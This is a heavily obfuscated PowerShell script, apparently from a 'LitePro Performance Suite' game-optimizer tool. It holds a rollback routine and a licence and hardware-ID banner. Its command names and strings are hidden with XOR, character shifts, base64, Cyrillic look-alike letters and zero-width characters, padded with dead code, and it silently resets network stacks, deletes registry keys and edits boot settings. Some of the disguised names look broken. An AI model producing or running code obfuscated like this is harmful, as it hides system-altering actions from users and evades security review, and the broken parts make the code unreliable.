    &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x4E,0x65,0x74,0x53)))+'h‍') &($(-join('g'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x4E,0x74)))) &('T​c‌'+'P') &(([string]::Format('{0}','se'))+('{0}' -f 't')) &(('{0}' -f 'gLob')+'аl') conGesTIOnProvIdEr=&(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('REVGQVVM')))+('{0}' -f 'T')) | out-Nu`LL
    NETSH &((-join([char]0x49, [char]0x4E))+$($k5179=13;$b=[byte[]](0x59);-join($b|%{[char]($_-bxor$k5179)}))) &(('{0}' -f 'TC')+$($k1525=14;$b=[byte[]](0x5e);-join($b|%{[char]($_-bxor$k1525)}))) &('S'+('{0}' -f 'et')) &(([string]::Format('{0}','GlO'))+$(-join('Lkv'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+16)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+16)%26))}else{[char]$c}}))) aUTOtUNINGLEVEL=&((-join('n','O','r'))+$($k4949='Xd9[na*fjWv';$b=[byte[]](0x35,0x05,0x55);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4949);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b3VULW51')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bGw='))))
    nETsH &(('{0}' -f 'IN')+$($k1870=242;$b=[byte[]](0xa6);-join($b|%{[char]($_-bxor$k1870)}))) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VA==')))+"$([char]0x63)$([char]0x50)") &($($k5371='.K#nueNQ!%9X';$b=[byte[]](0x5D,0x0E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5371);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$(-join('P'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}}))) &("$([char]0x47)$([char]0x6C)$([char]0x6F)$([char]0x42)"+$(-join('tE'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))) ECncAPAbIliTy=&("$([char]0x64)$([char]0x65)$([char]0x66)$([char]0x41)$([char]0x75)$([char]0x6C)"+$($k8892='l)H(t}KY?=3';$b=[byte[]](0x38);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8892);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bw==')))+('{0}{1}{2}' -f 'UT-NU','L','L'))
    NETsH &(('{0}' -f 'i')+(-join([char]0x4E, [char]0x74))) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dA==')))+'c‌p‌') &('S'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RXQ=')))) &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x67)))+(-join([char]0x6C, [char]0x4F, [char]0x42, [char]0x61, [char]0x4C))) TIMestAmPs=&(('D'+'E'+'F'+'aU'+'l')+"$([char]0x54)") | &((-join([char]0x6F, [char]0x75))+'t‌-‌N‌U‍l​L​')

    $xtdnrgIu = &((-join('G','e','T-','CHI','l'))+('Di'+'tE'+'m')) -paTh $(-join('MPQR:\XDXYJR\HzwwjsyHtsywtqXjy\Htsywtq\Hqfxx\{4i36j972-j325-11hj-gkh1-08002gj10318}'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}})) -ERRoRAcTIoN SilEntlYCoNTINUe
    for ($I_52308 = 0; $i_52308 -lt $xTdNRgiu.cOunt; $i_52308++) {
    $vGhyY0 = $XTDnrgIU[$I_52308];
    $Tt5So = $VgHyY0.pSpATH
        &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x52,0x65,0x4D,0x4F,0x56,0x45,0x2D,0x49,0x74,0x45,0x6D,0x70,0x52,0x6F)))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UEVydFk=')))) -pATh $TT5sO -NAME $($k6337=46;$b=[byte[]](0x04,0x6b,0x6b,0x6b,0x62,0x47,0x40,0x45,0x6f,0x4a,0x58,0x4b,0x5c,0x5a,0x47,0x5d,0x4b,0x43,0x4b,0x40,0x5a);-join($b|%{[char]($_-bxor$k6337)})) -ERRORactiOn silEntLycoNtiNUE
        &("$([char]0x52)$([char]0x45)"+$(-join('dfMV-zKvDgIFGVIKp'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}}))) -pAth $TT5sO -NaME ([System.Text.Encoding]::UTF8.GetString([byte[]](0x2A,0x45,0x6E,0x65,0x72,0x67,0x79,0x45,0x66,0x66,0x69,0x63,0x69,0x65,0x6E,0x74,0x45,0x74,0x68,0x65,0x72,0x6E,0x65,0x74))) -erroRaction siLenTlycoNtInuE
        &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x52,0x65,0x4D,0x6F,0x56,0x45,0x2D,0x69,0x74,0x65,0x4D,0x70,0x72,0x4F,0x50)))+$(-join('dqSx'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+1)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+1)%26))}else{[char]$c}}))) -PATH $tt5So -nAmE ('{0}{1}{2}{3}{4}{5}' -f '*','Green','Ethe','r','ne','t') -ERroractIoN sILEnTlYcONtiNUE
        &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Ug==')))+$($k3356='=c)@+R@YI7HyF';$b=[byte[]](0x78,0x0E,0x66,0x16,0x4E,0x7F,0x29,0x2D,0x2C,0x5A,0x18,0x2B,0x09,0x6D,0x06,0x7B,0x34,0x52);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3356);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -paTH $tT5So -NaME $(-join('RqygtFqypRnn'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}})) -ErROraCtIon SIlENTlYCONTInuE
}

$eUkj = [Math]::Round(74 / 2, 2); $eUkj = [Math]::Abs($eUkj); $eUkj = $null
if ($false) {
    $iniContent = "[Section1]
Key1=Val1
Key2=Val2"; $parsedIni = ConvertFrom-StringData -StringData $iniContent; Write-Debug "Parsed INI Key1: $($parsedIni.Key1)"
}
# Suppressing error for now to maintain flow
    $el4DQM = 'НКСU:\Соntrоl Раnеl\Моusе'
    NeW-iTeM`pRoPERty -PATh $El4dQm -naME ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TW91c2VTcGVlZA=='))) -vaLuE $(53 - 52) -pROpErtytypE stRING -forcE | OUT-NU`ll
    NeW-ItEmPrOPertY -PAth $EL4Dqm -naMe 'МоusеТhrеshоldІ' -ValUe $(16 % 10) -prOPERTyTYpe sTrING -FOrce | &($(-join('h'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+'Ut-NulL')
    NEW-itempropErty -patH $eL4DQm -naMe ('{0}{1}{2}{3}{4}{5}' -f 'Mouse','T','hresh','ol','d','2') -VaLuE $(37 - 27) -PrOpeRtYTYpe stRIng -FoRce | out-nul`l
    new-ItemproPErTY -Path $($k3563='(Ckrc;qM!=7';$b=[byte[]](0x60,0x08,0x28,0x27,0x59,0x67,0x32,0x22,0x4F,0x49,0x45,0x47,0x2F,0x4B,0x22,0x02,0x55,0x14,0x21,0x7D,0x76,0x52,0x51,0x21,0x04,0x13,0x11,0x5F);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3563);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -naMe ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('S2V5Ym9hcmREZWxheQ=='))) -vAlue $(57 - 56) -pROPertytypE StRIng -FOrCE | &($(-join('dJi-c'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}}))+$($k6545='$QZ2bG4!2Q:=J@';$b=[byte[]](0x71,0x1D,0x16);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6545);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
    NeW-itemPROpertY -PatH (-join([char]0x48, [char]0x4B, [char]0x43, [char]0x55, [char]0x3A, [char]0x5C, [char]0x43, [char]0x6F, [char]0x6E, [char]0x74, [char]0x72, [char]0x6F, [char]0x6C, [char]0x20, [char]0x50, [char]0x61, [char]0x6E, [char]0x65, [char]0x6C, [char]0x5C, [char]0x4B, [char]0x65, [char]0x79, [char]0x62, [char]0x6F, [char]0x61, [char]0x72, [char]0x64)) -NaME $(-join('MgadqctfUrggf'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}})) -vAlUE $(527 / 17) -pRoPertYtype STriNG -foRCE | &((-join('O','Ut-','N'))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VWxs'))))

    # RESTOre bCd cONsTaNtS
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Yg==')))+$($k7008=32;$b=[byte[]](0x63,0x44,0x45,0x44,0x69,0x54);-join($b|%{[char]($_-bxor$k7008)}))) /deLeTevAlUE usEPlaTFoRM`cLoCk -erRoRActiON SiLeNTlYCOnTInue | &($(-join('vb'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x74,0x2D,0x4E,0x55,0x6C,0x4C))))
    BCDEDIt /DeLEtEVaLue &(('{0}{1}{2}{3}{4}' -f 'd','iSaB','LE','dYn','a')+"$([char]0x4D)$([char]0x69)$([char]0x63)$([char]0x74)$([char]0x69)$([char]0x43)$([char]0x6B)") -ERROrAcTiOn SiLeNTLyCoNtInUe | &(([string]::Format('{0}{1}{2}{3}{4}','oU','T-','N','U','l'))+'l‌')

    # rEstoRe TElEmEtRy pROCESSinG
    &('sЕТ-SЕrvIС'+([System.Text.Encoding]::UTF8.GetString([byte[]](0x45)))) -NAme ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RGlhZ1RyYWNr'))) -stArtuPtyPE autoMAtiC -erroRaCTiON SIlentlYcOntinue
    &(('{0}' -f 'r')+$($k6668='8GvVK';$b=[byte[]](0x5D,0x2A,0x39,0x00,0x0E,0x15,0x0E,0x22,0x33,0x26,0x48,0x35,0x39,0x26,0x0E,0x4A,0x33,0x0F);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6668);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -pAth ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}','HKLM:','\','S','OFT','WAR','E\Pol','icie','s','\M','ic','rosof','t','\W','i','ndow','s','\D','ataC','o','llec','t','i','on')) -name ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWxsb3dUZWxlbWV0cnk='))) -ERrORactiON sIlENTlYcontINUE

    # reSTORe WindOWS sCHeDULer pROfilES
    $MYowmnRR = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SEtMTTpcU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cTXVsdGltZWRpYVxTeXN0ZW1Qcm9maWxl')))
    &((-join([char]0x6E, [char]0x45, [char]0x57))+$(-join('-vGRzCEbCreGl'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))) -path $MYoWmNrr -nAme (-join([char]0x4E, [char]0x65, [char]0x74, [char]0x77, [char]0x6F, [char]0x72, [char]0x6B, [char]0x54, [char]0x68, [char]0x72, [char]0x6F, [char]0x74, [char]0x74, [char]0x6C, [char]0x69, [char]0x6E, [char]0x67, [char]0x49, [char]0x6E, [char]0x64, [char]0x65, [char]0x78)) -vaLue 10 -pRoPertYTyPe Dword -foRce | &(('o'+'uT'+'-')+$($k7807='V4yMzH{c:)3';$b=[byte[]](0x18,0x61,0x35,0x21);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7807);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
    nEW-iTeMProPeRTy -PATH $myowMNRr -nAMe $($k9611=132;$b=[byte[]](0xd7,0xfd,0xf7,0xf0,0xe1,0xe9,0xd6,0xe1,0xf7,0xf4,0xeb,0xea,0xf7,0xed,0xf2,0xe1,0xea,0xe1,0xf7,0xf7);-join($b|%{[char]($_-bxor$k9611)})) -valuE 14 -prOPeRtyTyPE dWORd -ForcE | &($(-join('B'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))+('{0}{1}{2}' -f 'uT-nU','L','l'))

    $LsTmLL = ([System.Text.Encoding]::UTF8.GetString([byte[]](0x48,0x4B,0x4C,0x4D,0x3A,0x5C,0x53,0x4F,0x46,0x54,0x57,0x41,0x52,0x45,0x5C,0x4D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x5C,0x57,0x69,0x6E,0x64,0x6F,0x77,0x73,0x20,0x4E,0x54,0x5C,0x43,0x75,0x72,0x72,0x65,0x6E,0x74,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x5C,0x4D,0x75,0x6C,0x74,0x69,0x6D,0x65,0x64,0x69,0x61,0x5C,0x53,0x79,0x73,0x74,0x65,0x6D,0x50,0x72,0x6F,0x66,0x69,0x6C,0x65,0x5C,0x54,0x61,0x73,0x6B,0x73,0x5C,0x47,0x61,0x6D,0x65,0x73)))
    if (&(('TeST'+'-'+'Pa'+'t')+([System.Text.Encoding]::UTF8.GetString([byte[]](0x48)))) $lSTMll) {
        &($(-join('K'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x45,0x77,0x2D,0x49,0x74,0x45,0x6D,0x50,0x52,0x6F,0x70,0x65,0x72,0x74,0x79)))) -path $LsTmlL -Name $($k6659=12;$b=[byte[]](0x4b,0x5c,0x59,0x2c,0x5c,0x7e,0x65,0x63,0x7e,0x65,0x78,0x75);-join($b|%{[char]($_-bxor$k6659)})) -VaLUe (-53 + 61) -PROPERTytyPe Dword -force | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T1VULQ==')))+'N‌u​L‍L‍')
        NeW-itEMpRopeRtY -PAtH $lstmLL -nAME 'P​r‌i‌o‌r‌i‌t​y‍' -valUE (10 / 5) -prOPERTytYpe dword -fOrce | &((-join('oU','t-n','u'))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TGw='))))
        new-ITEmpRoPerTY -pAth $LstmLl -name $($k8836=33;$b=[byte[]](0x72,0x42,0x49,0x44,0x45,0x54,0x4d,0x48,0x4f,0x46,0x01,0x62,0x40,0x55,0x44,0x46,0x4e,0x53,0x58);-join($b|%{[char]($_-bxor$k8836)})) -vaLuE ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TWVkaXVt'))) -propERTytype stRiNG -ForCe | oUt-NUL`l
        NeW-iTEMpRopErty -paTH $LStMLl -Name ('{0}{1}{2}' -f 'SFIO ','Pri','ority') -vAlue ('No'+'r'+'mal') -PrOpertyTYpE strING -FoRce | ouT-nU`lL
    }

    $zQuYW = @(('{0}{1}{2}{3}{4}' -f 'Fi','veM','.e','x','e'), $($k6815=25;$b=[byte[]](0x5f,0x70,0x6f,0x7c,0x54,0x46,0x5e,0x4d,0x58,0x49,0x6b,0x76,0x7a,0x7c,0x6a,0x6a,0x37,0x7c,0x61,0x7c);-join($b|%{[char]($_-bxor$k6815)})), "$([char]0x46)$([char]0x69)$([char]0x76)$([char]0x65)$([char]0x4D)$([char]0x5F)$([char]0x62)$([char]0x32)$([char]0x36)$([char]0x39)$([char]0x39)$([char]0x5F)$([char]0x47)$([char]0x54)$([char]0x41)$([char]0x50)$([char]0x72)$([char]0x6F)$([char]0x63)$([char]0x65)$([char]0x73)$([char]0x73)$([char]0x2E)$([char]0x65)$([char]0x78)$([char]0x65)", $(-join('YboxF_u3095_ZMTIkhvxll.xqx'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}})), 'FіvеМ_b3258_GТАРrосеss.ехе', $(-join('FSZ5.dwd'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+1)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+1)%26))}else{[char]$c}})))
    for ($I_42856 = 0; $I_42856 -lt $ZQUyW.CoUNT; $I_42856++) {
    $RePiApxQ = $zQUyW[$I_42856];
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ckVNT1ZlLUk=')))+"$([char]0x74)$([char]0x45)$([char]0x6D)") -PaTH ((-join('HKLM:\SO','FTWARE\','M','ic','rosof','t\','Window','s NT\Cur','re','ntVersi','on\Imag','e File ','Executio','n Optio','ns','\')) + $RePiaPxQ) -reCuRSe -ErrorAcTioN SileNTlYcONTiNue | &($($k3305=76;$b=[byte[]](0x23,0x39,0x18,0x61);-join($b|%{[char]($_-bxor$k3305)}))+('{0}{1}{2}' -f 'nu','l','l'))
}

    $UwYlq = ([System.Text.Encoding]::UTF8.GetString([byte[]](0x48,0x4B,0x4C,0x4D,0x3A,0x5C,0x53,0x59,0x53,0x54,0x45,0x4D,0x5C,0x43,0x75,0x72,0x72,0x65,0x6E,0x74,0x43,0x6F,0x6E,0x74,0x72,0x6F,0x6C,0x53,0x65,0x74,0x5C,0x43,0x6F,0x6E,0x74,0x72,0x6F,0x6C,0x5C,0x53,0x65,0x73,0x73,0x69,0x6F,0x6E,0x20,0x4D,0x61,0x6E,0x61,0x67,0x65,0x72,0x5C,0x4D,0x65,0x6D,0x6F,0x72,0x79,0x20,0x4D,0x61,0x6E,0x61,0x67,0x65,0x6D,0x65,0x6E,0x74)))
    &('ne'+$(-join('Y-kvgORTqrGTva'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))) -PaTH $UwYLq -nAmE ([System.Text.Encoding]::UTF8.GetString([byte[]](0x4C,0x61,0x72,0x67,0x65,0x53,0x79,0x73,0x74,0x65,0x6D,0x43,0x61,0x63,0x68,0x65))) -vAlUe (71 - 71) -pRopERtytYPE DWoRd -foRce | &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x4F,0x75,0x74,0x2D,0x4E)))+('uL'+'L'))
    nEw-ITeMpropERtY -PATH $UwyLQ -NaME ('{0}{1}{2}{3}{4}' -f 'Syst','em','Pa','ge','s') -vALuE (18 + -18) -PROpeRTYtyPe DWord -fOrcE | &($($k6188=206;$b=[byte[]](0x81,0x9b,0xba,0xe3);-join($b|%{[char]($_-bxor$k6188)}))+(-join([char]0x6E, [char]0x75, [char]0x6C, [char]0x6C)))

    NEw-iTEMprOPErTy -paTH $($k8827='qU&4gTRV';$b=[byte[]](0x39,0x1E,0x65,0x61,0x5D,0x08,0x01,0x2F,0x02,0x21,0x43,0x59,0x3B,0x13,0x33,0x3B,0x14,0x16,0x49,0x5A,0x01,0x3D,0x35,0x05,0x05,0x3A,0x54,0x51);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8827);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -NAME ('{0}{1}{2}{3}{4}{5}' -f 'Game','D','V','R_','Ena','bled') -VAlue (-68 + 69) -prOPERTYtYpe DwoRD -FoRCe | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b3VULW51bA==')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TA=='))))

    if (&($(-join('bMAB-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}}))+$($k1021=68;$b=[byte[]](0x34,0x25,0x10,0x0c);-join($b|%{[char]($_-bxor$k1021)}))) $(-join('UXYZ:\FBSGJNER\Cbyvpvrf\Zvpebfbsg\Jvaqbjf\DbF'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))) {
        &($(-join('SfNpwf-j'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+25)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+25)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VEVt')))) -path $(-join('ORST:\ZVMADHYL\Wvspjplz\Tpjyvzvma\Dpukvdz\XvZ'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}})) -REcuRse -FORcE -ErrORaCTiON SILEntLYContInue | &(('Ou'+'T'+'-'+'nu')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bEw='))))
    }

    # DeLetE auTO-FLuSH bACKGROUND taSK
    unREgIsTeR-s`CHeduLEDTaSK -TAskNAME "$([char]0x4C)$([char]0x69)$([char]0x74)$([char]0x65)$([char]0x50)$([char]0x72)$([char]0x6F)$([char]0x5F)$([char]0x4D)$([char]0x65)$([char]0x6D)$([char]0x6F)$([char]0x72)$([char]0x79)$([char]0x5F)$([char]0x41)$([char]0x75)$([char]0x74)$([char]0x6F)$([char]0x46)$([char]0x6C)$([char]0x75)$([char]0x73)$([char]0x68)" -coNFiRM:(!1) -ErroractIOn siLENtLYcOntiNue | &(('O'+'Ut'+'-NU')+(-join('l','L')))

    pOwercfG /H oN | &($($k9960='#8n9m(s;<,JS';$b=[byte[]](0x4C,0x4D,0x1A,0x14);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9960);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+'NUlL')
    nETSH &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x49,0x4E)))+'T') iP &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UmVT')))+$(-join('Od'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+16)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+16)%26))}else{[char]$c}}))) | out`-nuLl
    NETsh &((-join([char]0x57, [char]0x49, [char]0x6E))+$(-join('DZnV'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+15)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+15)%26))}else{[char]$c}}))) &($(-join('eR'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))+('S'+'E'+'T')) | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b1V0LU5V')))+$(-join('aa'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}})))

    wRIte-HoSt (-join('``','n[+] ','RO','LL','BACK R','UN COMP','L','ETE: ','Fa','ctory de','faul','ts r','e','s','tore','d.')) -foREGrOUNDcOlOR GReeN
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UkVh')))+(-join([char]0x44, [char]0x2D, [char]0x48, [char]0x6F, [char]0x73, [char]0x54))) $(-join('``zBdqee Qzfqd fa dqfgdz fa Yqzg...'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))
}
switch (2) { 1 {'a'} 2 {'b'} default {'c'} } | Out-Null
function SHOw-weLCoMEHeAder {
    AdjUST-CoNsoLEWiNDow
    CLeAR-hosT
    $KnzQT = &($(-join('USH-v'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x57,0x49,0x44))))
    $PihsH = &((-join([char]0x47, [char]0x65, [char]0x54, [char]0x2D, [char]0x53, [char]0x59, [char]0x73, [char]0x74, [char]0x65, [char]0x6D, [char]0x53, [char]0x70))+'еСS')
    WriTe-Host ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}','=','===','==','=====','=','===','===','==','=====','==','===','====','=','====','===','==','====','==','====','=====')) -FOREGrouNDCoLOR cYAn
    &('WRIТЕ-'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aG9TVA==')))) (-join('  ','   LITE','PRO PERF','ORMA','NCE',' SUITE  ','[E','X','TREME E','D','IT','ION]   ','  ','  ')) -FoReGRoUNdcOlOR gReEn
    WriTE-H`oSt (-join('===','========','=====','=','=====','==','========','==','=====','====','====','==','===','=','=====','=')) -fOreGrOundCoLoR cyaN
    &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x57,0x52,0x69)))+('Te'+'-h'+'oSt')) ' LIСЕNSЕ : VЕRIFIЕD ' -fOreGROUNdcOLor GrEen
    &($(-join('dYPal-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}}))+([string]::Format('{0}{1}','hO','st'))) (([string]::Format('{0}{1}{2}',' HWID','    ',': ')) + $knzqt) -foRegRouNDCOlOR GrAy
    &($(-join('bWnyJ-m'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}}))+$(-join('VzA'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}}))) ''''(('{0}{1}{2}{3}{4}{5}' -f ' R','IG  ',' ',' ',' ',': ') + $($pIHsH['CPU']) + ([string]::Format('{0}{1}',' |',' ')) + $($pIHsH['RAM'])) -FoReGrounDCoLOR gRaY
    wr`Ite-hosT ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}' -f '=====','=====','=====','=====','=====','=====','==','===','====','===','===','=====','=','=','==','====','=') -FORegrouNDCOLoR cyAn
    wrItE`-HOst (([System.Text.Encoding]::UTF8.GetString([byte[]](0x20,0x5B))) + $(-66 + 67) + ([System.Text.Encoding]::UTF8.GetString([byte[]](0x5D,0x20,0x20,0x49,0x4E,0x53,0x54,0x41,0x4C,0x4C,0x20,0x4F,0x50,0x54,0x49,0x4D,0x49,0x5A,0x45,0x20,0x41,0x4C,0x4C,0x20)))) -foRegRoUNDcolOR gREen
    WRIte-Ho`st (([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IFs='))) + $(16 + -14) + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('XSAgRklWRU0gUW9TICBORVRXT1JLIFBPTElDWQ==')))) -FOrEgROUNDColOR wHIte
    WritE-H`oSt (([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IFs='))) + $(47 - 44) + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('XSAgUk9MTEJBQ0sgQUxM')))) -FOrEgRounDColOR YeLlOw
